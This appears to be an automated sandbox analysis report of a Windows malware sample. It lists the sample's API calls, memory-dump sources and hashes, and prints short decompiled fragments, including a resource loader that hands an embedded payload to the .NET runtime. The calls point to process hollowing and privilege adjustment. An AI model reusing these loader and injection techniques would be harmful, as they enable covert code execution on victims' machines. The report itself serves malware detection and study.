                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: aba6f2e666d3b134324b3682b0282aa841c23778ab367fd1cf1b892284f3ebbd
                                                                                              • Instruction ID: a8f7471f63427deed5f9e1ffcd8bdc8eda18816af95421991de527d8001c7af6
                                                                                              • Opcode Fuzzy Hash: aba6f2e666d3b134324b3682b0282aa841c23778ab367fd1cf1b892284f3ebbd
                                                                                              • Instruction Fuzzy Hash: 7C21B5B54097846FE7128F54DC85F96BFA8EF42328F0884EAE9449F193E374A905C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 9de6f94628f61913c42d4f22e009bad6a6867ff5aa41a0f8c9a20d150520eeaf
                                                                                              • Instruction ID: 450d0359e8b3786acc403fbac3123c5fd3f04d00a48545f1ebaa69a3b17eb57e
                                                                                              • Opcode Fuzzy Hash: 9de6f94628f61913c42d4f22e009bad6a6867ff5aa41a0f8c9a20d150520eeaf
                                                                                              • Instruction Fuzzy Hash: 5D2191B55093846FE7128F65DC84F96BFB8EF06310F1884EAE984CF152D264A449CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04BD4FC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdjustPrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 2874748243-0
                                                                                              • Opcode ID: 44423e6d9a5ff591ea648c10b4d1cc12dd9ba5658919a38fe0f24c4d265fe063
                                                                                              • Instruction ID: e7099c3d3364b068cf14aa5ae65d2ccb79d18fcc778b5f1a7d23fcbff8a47cd4
                                                                                              • Opcode Fuzzy Hash: 44423e6d9a5ff591ea648c10b4d1cc12dd9ba5658919a38fe0f24c4d265fe063
                                                                                              • Instruction Fuzzy Hash: FD21A3755097C49FDB228F25DC44B52BFB4EF06310F0884EAE9898F163E371A908CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04BD59B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationQuerySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3562636166-0
                                                                                              • Opcode ID: aff1804574e218483a4f8aeb52d9e27a810fc7b4c3da59407656cae4f1706a61
                                                                                              • Instruction ID: 3faf8b07bfe008a21a2a22e2b4cd1511d9b125691341ae2c3062a482a4c70299
                                                                                              • Opcode Fuzzy Hash: aff1804574e218483a4f8aeb52d9e27a810fc7b4c3da59407656cae4f1706a61
                                                                                              • Instruction Fuzzy Hash: 7A216D714093C49FDB128F219854AA2BFB0EF16224F1C84DEE9C84F153E266A559DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction ID: e67d35d7539a634baaea9005220ea44c45924f00a93f80212f9770d82c3ce608
                                                                                              • Opcode Fuzzy Hash: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction Fuzzy Hash: 201190B1504204AEEB20DF59DC84F96FBA8EF44710F14C4AAEA499B241E674E4048B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04BD5BEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3527976591-0
                                                                                              • Opcode ID: ad55f228409a154124e4bcc95d217c6adf21af25392d41199bd234f64fc4246a
                                                                                              • Instruction ID: 125e5190195042a64f348acd29370adee5afd114b03861be26ac6d63e53e409c
                                                                                              • Opcode Fuzzy Hash: ad55f228409a154124e4bcc95d217c6adf21af25392d41199bd234f64fc4246a
                                                                                              • Instruction Fuzzy Hash: 4E117C72408384AFEB228F55DC44BA2FFB4EF46220F0885DAED858F112D375A459DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: f7dcccb298006c2c322acf7434f6c4e0ef5374a4372f14294624b3d0e70c46e0
                                                                                              • Instruction ID: 6143510af2dffe4c214924f1acb14aa429fe0f69ea172400c155bedb34fdf5eb
                                                                                              • Opcode Fuzzy Hash: f7dcccb298006c2c322acf7434f6c4e0ef5374a4372f14294624b3d0e70c46e0
                                                                                              • Instruction Fuzzy Hash: A211E971504204AFEB11DF55DC84F6AFBA8EF44324F1484E6EE499F241E674A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04BD4FC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdjustPrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 2874748243-0
                                                                                              • Opcode ID: c598b225f5769f29ea28ed1756ab627409665f9d474632ef0702fb8219d5fb0e
                                                                                              • Instruction ID: 16f6b604329f444babbb66dc2cb07bcbf392640b7229b3f0cfbe5b8ad6bed11d
                                                                                              • Opcode Fuzzy Hash: c598b225f5769f29ea28ed1756ab627409665f9d474632ef0702fb8219d5fb0e
                                                                                              • Instruction Fuzzy Hash: 54115E755002449FDB208F55D844B56FBE4EF04320F08C4AAED498B662E371F418DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04BD5BEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3527976591-0
                                                                                              • Opcode ID: 0178fca1e0b7bd13ee8304a09e58ce703ff8f1b47c39294bf536245875df6394
                                                                                              • Instruction ID: 9d08b94186dafbeb9b991f08ff765f55c3adf654af10f149f136bcf0d0ae0994
                                                                                              • Opcode Fuzzy Hash: 0178fca1e0b7bd13ee8304a09e58ce703ff8f1b47c39294bf536245875df6394
                                                                                              • Instruction Fuzzy Hash: 7F018C71504244AFDB308F55E844B56FFE0EF04320F08C4AADD498B216E275A058DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: 1cba8e82b971f6c01a1a615d9ee191ed23749a227cde37311380032aff3d68f8
                                                                                              • Instruction ID: 8a7c2aa471d65cb1c724a8ce08243dc3c3bbeda9ecc144f6fd950df038bf66de
                                                                                              • Opcode Fuzzy Hash: 1cba8e82b971f6c01a1a615d9ee191ed23749a227cde37311380032aff3d68f8
                                                                                              • Instruction Fuzzy Hash: EE01BC718102409FEB20CF55E885B66FFA0EF44320F18C4AEED998F252D376A409CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 04BD5B3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: SectionUnmapView
                                                                                              • String ID:
                                                                                              • API String ID: 498011366-0
                                                                                              • Opcode ID: f3eaf91c0eec750e0ca32e91fa6af45d2c893e168ef2b8f862efd63b656f37de
                                                                                              • Instruction ID: 6f560828817e7928ee99b761e44fe179fdee706e21c4f66627f70e421a65f499
                                                                                              • Opcode Fuzzy Hash: f3eaf91c0eec750e0ca32e91fa6af45d2c893e168ef2b8f862efd63b656f37de
                                                                                              • Instruction Fuzzy Hash: 7D018B71904244EFEB20CF15E884B65FFA4EF44220F08C4EADD498F242E275A408CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04BD59B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationQuerySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3562636166-0
                                                                                              • Opcode ID: ac0e020c7802ac9b4312a4d29e4ae8e276f75242442148c3f3e0c983a755ef43
                                                                                              • Instruction ID: 848ab80fd233b0d40e417205020e1f71d90becddb13f4cffdc65a24f95870652
                                                                                              • Opcode Fuzzy Hash: ac0e020c7802ac9b4312a4d29e4ae8e276f75242442148c3f3e0c983a755ef43
                                                                                              • Instruction Fuzzy Hash: 0301AD75500304AFDB308F15D884B25FFA0FF54320F18C4DADD890B256E279A418DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401E1D() {
                                                                                              				_Unknown_base(*)()* _t1;
                                                                                              
                                                                                              				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                                                                              				return _t1;
                                                                                              			}





                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                                              • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401489() {
                                                                                              				void* _v8;
                                                                                              				struct HRSRC__* _t4;
                                                                                              				long _t10;
                                                                                              				struct HRSRC__* _t12;
                                                                                              				void* _t16;
                                                                                              
                                                                                              				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                                                                              				_t12 = _t4;
                                                                                              				if(_t12 == 0) {
                                                                                              					L6:
                                                                                              					ExitProcess(0);
                                                                                              				}
                                                                                              				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                                                              				if(_t16 != 0) {
                                                                                              					_v8 = LockResource(_t16);
                                                                                              					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                                                              					_t13 = _v8;
                                                                                              					if(_v8 != 0 && _t10 != 0) {
                                                                                              						L00401000(_t13, _t10); // executed
                                                                                              					}
                                                                                              				}
                                                                                              				FreeResource(_t16);
                                                                                              				goto L6;
                                                                                              			}









                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                                              • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                                              • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                                              • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                                                • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                                              • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                                              • ExitProcess.KERNEL32 ref: 004014EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                              • String ID: v2.0.50727
                                                                                              • API String ID: 2372384083-2350909873
                                                                                              • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                                              • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              • GetPerAdapterInfo.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD33E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdapterAdaptersAddressesInfo
                                                                                              • String ID:
                                                                                              • API String ID: 4108532965-0
                                                                                              • Opcode ID: 12a132aa8eb3807a90a16e5622604203610fb9f5883b5ea9004d7260ba8db84b
                                                                                              • Instruction ID: 7132c71b30d1e8c696a948ef7eaacec6a2127913649a5f4d17f8fc404bccfd1a
                                                                                              • Opcode Fuzzy Hash: 12a132aa8eb3807a90a16e5622604203610fb9f5883b5ea9004d7260ba8db84b
                                                                                              • Instruction Fuzzy Hash: 7C31D276409344AFEB118F15DC85F66FFB8EF45320F0885EAED498B252D325A508CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004055C5(void* __ecx) {
                                                                                              				void* _t6;
                                                                                              				void* _t14;
                                                                                              				void* _t18;
                                                                                              				WCHAR* _t19;
                                                                                              
                                                                                              				_t14 = __ecx;
                                                                                              				_t19 = GetEnvironmentStringsW();
                                                                                              				if(_t19 != 0) {
                                                                                              					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                                                                              					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                                                                              					_t18 = _t6;
                                                                                              					if(_t18 != 0) {
                                                                                              						E0040ACF0(_t18, _t19, _t12);
                                                                                              					}
                                                                                              					E00403E03(0);
                                                                                              					FreeEnvironmentStringsW(_t19);
                                                                                              				} else {
                                                                                              					_t18 = 0;
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}








                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free
                                                                                              • String ID:
                                                                                              • API String ID: 3328510275-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(?,00000E80), ref: 04BD3523
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getaddrinfo
                                                                                              • String ID:
                                                                                              • API String ID: 300660673-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,?,?), ref: 00ACB932
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaLookupSids.ADVAPI32(?,00000E80), ref: 00ACB5EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupSids
                                                                                              • String ID:
                                                                                              • API String ID: 2427636062-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAIoctl.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3711
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Ioctl
                                                                                              • String ID:
                                                                                              • API String ID: 3041054344-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(?,00000E80), ref: 04BD58DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3AB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RasEnumConnectionsW.RASAPI32(?,00000E80,?,?), ref: 04BD222A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionsEnum
                                                                                              • String ID:
                                                                                              • API String ID: 3832085198-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD4B28
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindClose.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2EC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00ACBDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(?,00000E80), ref: 04BD58DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(?,00000E80,?,?), ref: 04BD381E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 00ACAC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaLookupSids.ADVAPI32(?,00000E80), ref: 00ACB5EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupSids
                                                                                              • String ID:
                                                                                              • API String ID: 2427636062-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACAD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessTimes.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACB19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00ACB4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD697A
